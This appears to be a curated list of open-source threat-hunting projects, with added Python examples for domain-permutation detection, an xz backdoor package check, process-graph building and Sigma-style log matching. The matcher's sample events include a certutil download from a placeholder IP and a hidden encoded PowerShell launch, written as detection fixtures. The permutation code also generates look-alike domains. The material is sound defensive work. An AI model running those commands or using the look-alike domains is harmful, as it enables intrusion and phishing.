Top 23 threat-hunting Open-Source Projects
-
Project mention: A recent abrupt change in Internet SSH brute force attacks against us | news.ycombinator.com | 2024-02-24
-
-
dnstwist
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
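As an added example (not dnstwist's own code), the core of such a permutation engine: a few of the candidate classes dnstwist generates (omission, transposition, repetition, addition and single-character homoglyphs), a punycode conversion for the resulting IDN names, and a flag for candidates that are no longer pure ASCII. The confusables table and the assumption that the registrable name is everything before the last label are simplifications made here; a real engine carries a full table and a public-suffix list.

```python
import string

# Constructed confusables table for this demo: Cyrillic and digit look-alikes
# for a few Latin letters. A real engine ships a far larger table.
HOMOGLYPHS = {
    "a": ["\u0430"],            # Cyrillic small a
    "c": ["\u0441"],            # Cyrillic small es
    "e": ["\u0435"],            # Cyrillic small ie
    "i": ["\u0456", "1", "l"],  # Cyrillic small i, digit one, letter ell
    "l": ["1", "i"],
    "o": ["\u043e", "0"],       # Cyrillic small o, digit zero
    "p": ["\u0440"],            # Cyrillic small er
}


def split_domain(domain):
    """Split 'name.tld' into (name, tld).

    Assumption: the registrable name is everything before the last label.
    There is no public-suffix list here, so 'example.co.uk' would be split
    as ('example.co', 'uk').
    """
    name, _, tld = domain.lower().rpartition(".")
    return name, tld


def omission(name):        # drop one character: exmple
    for i in range(len(name)):
        yield name[:i] + name[i + 1:]


def transposition(name):   # swap two neighbours: exmaple
    for i in range(len(name) - 1):
        yield name[:i] + name[i + 1] + name[i] + name[i + 2:]


def repetition(name):      # double one character: exaample
    for i in range(len(name)):
        yield name[:i] + name[i] + name[i:]


def addition(name):        # append one character: examplex
    for ch in string.ascii_lowercase + string.digits:
        yield name + ch


def homoglyph(name):       # replace one character with a look-alike
    for i, ch in enumerate(name):
        for glyph in HOMOGLYPHS.get(ch, []):
            yield name[:i] + glyph + name[i + 1:]


GENERATORS = {
    "omission": omission,
    "transposition": transposition,
    "repetition": repetition,
    "addition": addition,
    "homoglyph": homoglyph,
}


def fuzz(domain):
    """Return (kind, candidate) pairs, deduplicated, never including the input."""
    name, tld = split_domain(domain)
    seen = {domain.lower()}
    candidates = []
    for kind, generate in GENERATORS.items():
        for variant in generate(name):
            full = f"{variant}.{tld}"
            if full in seen:
                continue
            seen.add(full)
            candidates.append((kind, full))
    return candidates


def to_idna(domain):
    """ASCII form as it appears in DNS and certificates (xn-- labels for IDN)."""
    return domain.encode("idna").decode("ascii")


def is_homograph(domain):
    """True when the candidate relies on non-ASCII look-alike characters."""
    return not domain.isascii()


if __name__ == "__main__":
    for kind, candidate in fuzz("example.com"):
        tag = " [homograph]" if is_homograph(candidate) else ""
        print(f"{kind:14} {candidate:20} {to_idna(candidate)}{tag}")
```

The candidates are what you would resolve (or check against certificate transparency logs) to find registered look-alikes; the xn-- form is what actually shows up in DNS answers, TLS SANs and proxy logs, so hunts should match on both spellings.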
-
sysmon-config
cd c:\sysmon
git clone https://github.com/SwiftOnSecurity/sysmon-config
sysmon -accepteula -i sysmon-config/sysmon-config.xml
-
Suricata
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
-
ThreatHunter-Playbook
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
-
awesome-threat-detection
A curated list of awesome threat detection and hunting resources
-
securityonion
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, detections, and case management. It also includes other tools such as osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.
-
malwoverview
Malwoverview is a first-response tool for threat hunting that offers intel from VirusTotal, Hybrid Analysis, URLHaus, Polyswarm, Malshare, AlienVault, Malpedia, Malware Bazaar, ThreatFox, Triage and InQuest, and can scan Android devices against VirusTotal.
-
Project mention: Angle-grinder: Slice and dice logs on the command line | news.ycombinator.com | 2024-04-29
There's already a DFIR log tool named chainsaw: https://github.com/WithSecureLabs/chainsaw
-
Project mention: Xzbot: Notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094) | news.ycombinator.com | 2024-04-01
> It doesn't matter.
To understand the exact behavior and extent of the backdoor, this does matter. An end-to-end proof of how it works is exactly what was needed.
> A way to check if servers are vulnerable is probably by querying the package manager
Yes, this has been known since the initial report + later discovering what exact strings are present for the payload.
https://github.com/Neo23x0/signature-base/blob/master/yara/b...
> Not very sophisticated, but it'll work.
Unfortunately, we live in a world with closed servers and appliances; being able, as a customer or pen tester, to rule out a certain class of security issues without having the source/insights available is usually desirable.
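One form of the package-manager check discussed in the thread above, as an added example that is not part of the thread or of xzbot: parse `dpkg -l` and `rpm -qa` output and flag xz/liblzma packages at the upstream versions that shipped the backdoor, 5.6.0 and 5.6.1. The sample output lines are constructed, and the package-name set is an assumption covering Debian/Ubuntu and Fedora/RHEL-family naming. When run as a script it queries the real tool if one is on PATH and falls back to the samples otherwise.

```python
import re
import shutil
import subprocess

# Upstream xz / liblzma releases that contained the backdoor (CVE-2024-3094).
VULNERABLE_VERSIONS = {"5.6.0", "5.6.1"}

# Assumption: package names carrying liblzma on Debian/Ubuntu and Fedora/RHEL-family hosts.
XZ_PACKAGES = {"xz-utils", "liblzma5", "liblzma-dev", "xz", "xz-libs", "xz-devel"}

# 'dpkg -l' rows: status, name[:arch], version, arch, description.
DPKG_ROW = re.compile(r"^(?P<status>[a-z]{2})\s+(?P<name>[^\s:]+)(?::\S+)?\s+(?P<version>\S+)")

# 'rpm -qa' rows: name-version-release.arch (the name may itself contain hyphens).
RPM_ROW = re.compile(r"^(?P<name>.+)-(?P<version>[^-]+)-(?P<release>[^-]+)\.(?P<arch>[^.]+)$")

# Constructed sample output (not captured from a real host).
DPKG_SAMPLE = """\
Desired=Unknown/Install/Remove/Purge/Hold
||/ Name              Version        Architecture Description
+++-=================-==============-============-=================================
ii  liblzma5:amd64    5.6.1-1        amd64        XZ-format compression library
ii  xz-utils          5.6.1-1        amd64        XZ-format compression utilities
ii  zlib1g:amd64      1:1.3.dfsg-3   amd64        compression library - runtime
""".splitlines()

RPM_SAMPLE = """\
xz-libs-5.6.0-2.fc40.x86_64
xz-5.6.0-2.fc40.x86_64
bash-5.2.26-3.fc40.x86_64
xz-libs-5.4.6-3.fc39.i686
""".splitlines()


def parse_dpkg(lines):
    """Return (name, upstream_version) for installed packages in 'dpkg -l' output."""
    packages = []
    for line in lines:
        m = DPKG_ROW.match(line)
        if not m or not m.group("status").startswith("i"):   # 'ii', 'ih', ...: installed
            continue
        version = re.sub(r"^\d+:", "", m.group("version"))  # drop the epoch
        version = version.rsplit("-", 1)[0]                  # drop the Debian revision
        packages.append((m.group("name"), version))
    return packages


def parse_rpm(lines):
    """Return (name, version) for every row of 'rpm -qa' output."""
    packages = []
    for line in lines:
        m = RPM_ROW.match(line.strip())
        if m:
            packages.append((m.group("name"), m.group("version")))
    return packages


def vulnerable_xz(packages):
    """Filter to xz/liblzma packages at a backdoored upstream version."""
    return [(name, ver) for name, ver in packages
            if name in XZ_PACKAGES and ver in VULNERABLE_VERSIONS]


def scan_local_host():
    """Query the real package manager when available; otherwise use the samples."""
    if shutil.which("dpkg"):
        out = subprocess.run(["dpkg", "-l"], capture_output=True, text=True, check=False).stdout
        return vulnerable_xz(parse_dpkg(out.splitlines()))
    if shutil.which("rpm"):
        out = subprocess.run(["rpm", "-qa"], capture_output=True, text=True, check=False).stdout
        return vulnerable_xz(parse_rpm(out.splitlines()))
    return vulnerable_xz(parse_dpkg(DPKG_SAMPLE)) + vulnerable_xz(parse_rpm(RPM_SAMPLE))


if __name__ == "__main__":
    hits = scan_local_host()
    print("backdoored xz packages:", hits or "none found")
```

The check only reports what the package manager believes is installed. A liblzma rebuilt from the tampered tarball outside the package system, or an appliance you cannot log in to, needs the string-based YARA rule linked above or a remote check instead, which is the gap the thread is discussing.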
-
hayabusa
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Project mention: Hayabusa: Sigma-based forensics timeline generator for Windows event logs | news.ycombinator.com | 2024-04-24
-
matano
Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS
sorry, that's https://matano.dev
-
beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)
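As an added example (not beagle's own code), how a process tree graph is built from Sysmon process-creation records: each event contributes a parent-to-child edge keyed on ProcessGuid, a parent that is only ever referenced gets a placeholder node so the tree still has a root, and the resulting graph can be walked for an ancestry chain or dumped as Graphviz DOT. The event records and their GUIDs are constructed for the example.

```python
# Constructed Sysmon EventID 1 (process create) records, trimmed to the fields
# a graph builder needs. The GUIDs are invented for the example.
EVENTS = [
    {"ProcessGuid": "{guid-cmd}", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentProcessGuid": "{guid-explorer}", "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessGuid": "{guid-certutil}", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentProcessGuid": "{guid-cmd}", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"ProcessGuid": "{guid-powershell}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessGuid": "{guid-winword}",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def build_graph(events):
    """Nodes keyed by ProcessGuid; each holds image, parent guid and child guids.

    A parent that only ever appears as ParentProcessGuid (its own create event
    predates the log) gets a placeholder node so the tree still has a root.
    """
    nodes = {}

    def node(guid, image):
        return nodes.setdefault(guid, {"image": image, "parent": None, "children": []})

    for ev in events:
        parent = node(ev["ParentProcessGuid"], basename(ev["ParentImage"]))
        child = node(ev["ProcessGuid"], basename(ev["Image"]))
        child["parent"] = ev["ParentProcessGuid"]
        parent["children"].append(ev["ProcessGuid"])
    return nodes


def ancestry(nodes, guid):
    """Image names from the root down to the given process."""
    chain, seen = [], set()
    while guid is not None and guid not in seen:   # guard against malformed cycles
        seen.add(guid)
        chain.append(nodes[guid]["image"])
        guid = nodes[guid]["parent"]
    return chain[::-1]


def roots(nodes):
    """Images of processes with no known parent (tree roots), sorted."""
    return sorted(n["image"] for n in nodes.values() if n["parent"] is None)


def to_dot(nodes):
    """Graphviz DOT text, e.g. for 'dot -Tsvg'."""
    lines = ["digraph processes {"]
    for guid, n in nodes.items():
        lines.append(f'  "{guid}" [label="{n["image"]}"];')
        for child in n["children"]:
            lines.append(f'  "{guid}" -> "{child}";')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    graph = build_graph(EVENTS)
    print(" -> ".join(ancestry(graph, "{guid-certutil}")))
    print(to_dot(graph))
```

Keying on ProcessGuid rather than PID matters because PIDs are reused during a session; a graph keyed on PIDs silently merges unrelated processes. The ancestry walk is what turns a single suspicious event (certutil writing to disk) into the chain an analyst actually wants to see (explorer.exe -> cmd.exe -> certutil.exe).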
-
APT-Hunter
APT-Hunter is a threat hunting tool for Windows event logs, built with a purple-team mindset to detect APT movements hidden in the sea of Windows event logs and to decrease the time needed to uncover suspicious activity.
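What chainsaw, Hayabusa and APT-Hunter have in common is running detection rules over Windows event logs and emitting a timeline. As an added example (not code from any of those projects), a minimal Sigma-style matcher: rules carry a logsource, a selection map with `contains`/`endswith`/`startswith` field modifiers (list values are OR, fields are AND, comparison is case-insensitive), an optional filter, and a condition of either `selection` or `selection and not filter`. The events and both rules are constructed for the example; the CcmExec.exe filter stands in for a local tuning exclusion and is an assumption.

```python
from datetime import datetime

# Constructed Sysmon and Security event records (field names follow the
# Windows event XML; values are invented for the example).
EVENTS = [
    {"TimeCreated": "2024-04-24T10:02:11", "Computer": "WS01",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAC4ALgAuACkA",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"TimeCreated": "2024-04-24T09:58:40", "Computer": "WS01",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/update.exe C:\Users\Public\update.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"TimeCreated": "2024-04-24T10:05:00", "Computer": "WS02",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -enc SQBFAFgAIAAoAC4ALgAuACkA",
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe"},
    {"TimeCreated": "2024-04-24T10:00:00", "Computer": "WS01",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"TimeCreated": "2024-04-24T10:01:30", "Computer": "WS01",
     "Channel": "Security", "EventID": 4624,
     "TargetUserName": "alice", "LogonType": 2},
]

# Constructed rules in a Sigma-like shape (not copied from the Sigma repository).
RULES = [
    {"title": "Certutil download to disk", "level": "high",
     "logsource": {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1},
     "detection": {
         "selection": {"Image|endswith": "\\certutil.exe",
                       "CommandLine|contains": ["urlcache", "-split"]},
         "condition": "selection"}},
    {"title": "Encoded PowerShell command line", "level": "medium",
     "logsource": {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1},
     "detection": {
         "selection": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                       "CommandLine|contains": [" -enc ", " -encodedcommand "]},
         # Assumption: local tuning, the SCCM agent legitimately launches encoded PowerShell.
         "filter": {"ParentImage|endswith": "\\ccmexec.exe"},
         "condition": "selection and not filter"}},
]


def field_matches(value, pattern, modifier):
    v, p = str(value).lower(), str(pattern).lower()
    if modifier == "contains":
        return p in v
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "":
        return v == p
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """All fields must match (AND); a list of patterns for one field is OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(field_matches(event[field], p, modifier) for p in patterns):
            return False
    return True


def rule_matches(event, rule):
    if any(event.get(k) != v for k, v in rule["logsource"].items()):
        return False
    detection = rule["detection"]
    condition = detection["condition"]
    if condition == "selection":
        return selection_matches(event, detection["selection"])
    if condition == "selection and not filter":
        return (selection_matches(event, detection["selection"])
                and not selection_matches(event, detection["filter"]))
    raise ValueError(f"unsupported condition: {condition}")


def build_timeline(events, rules):
    """Run every rule over every event; return hits sorted by event time."""
    hits = []
    for event in events:
        for rule in rules:
            if rule_matches(event, rule):
                hits.append({"time": event["TimeCreated"], "computer": event["Computer"],
                             "event_id": event["EventID"], "level": rule["level"],
                             "rule": rule["title"], "detail": event.get("CommandLine", "")})
    hits.sort(key=lambda h: datetime.fromisoformat(h["time"]))
    return hits


if __name__ == "__main__":
    for hit in build_timeline(EVENTS, RULES):
        print(f'{hit["time"]}  {hit["computer"]:5} {hit["event_id"]:>5}  '
              f'{hit["level"]:6}  {hit["rule"]}  |  {hit["detail"]}')
```

Note what the sort buys you: the certutil download at 09:58:40 is logged after the PowerShell event in the input, but the timeline puts it first, which is the order an analyst needs to reconstruct the intrusion. The `and not filter` branch is also where most real-world tuning lives; a matcher that only supports bare selections forces you to weaken the selection itself instead.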
-
threat-hunting related posts
-
MISP galaxy - cybersecurity and other related knowledge base
-
Software Hardening Tools for System Defense
-
Teler: Real-Time HTTP Intrusion Detection
-
A recent abrupt change in Internet SSH brute force attacks against us
-
Crawlector Version 2.0 has been released. This is a milestone release.
-
Free Tech Tools and Resources - Terraform for AWS, Cyberthreat Tool, Vim Training & More
-
Troubleshooting Intermittent Slowness on Network Share
-
Index
What are some of the best open-source threat-hunting projects? This list will help you:
# | Project | Stars
---|---|---
1 | MISP | 5,253
2 | dnstwist | 4,813
3 | sysmon-config | 4,736
4 | Suricata | 4,457
5 | ThreatHunter-Playbook | 3,967
6 | IntelOwl | 3,750
7 | HELK | 3,742
8 | awesome-threat-detection | 3,590
9 | awesome-yara | 3,472
10 | securityonion | 3,146
11 | malwoverview | 2,916
12 | chainsaw | 2,713
13 | sysmon-modular | 2,619
14 | signature-base | 2,442
15 | APT_REPORT | 2,359
16 | hayabusa | 2,177
17 | EVTX-ATTACK-SAMPLES | 2,171
18 | yeti | 1,709
19 | SysmonTools | 1,478
20 | matano | 1,443
21 | beagle | 1,269
22 | YaraHunter | 1,234
23 | APT-Hunter | 1,228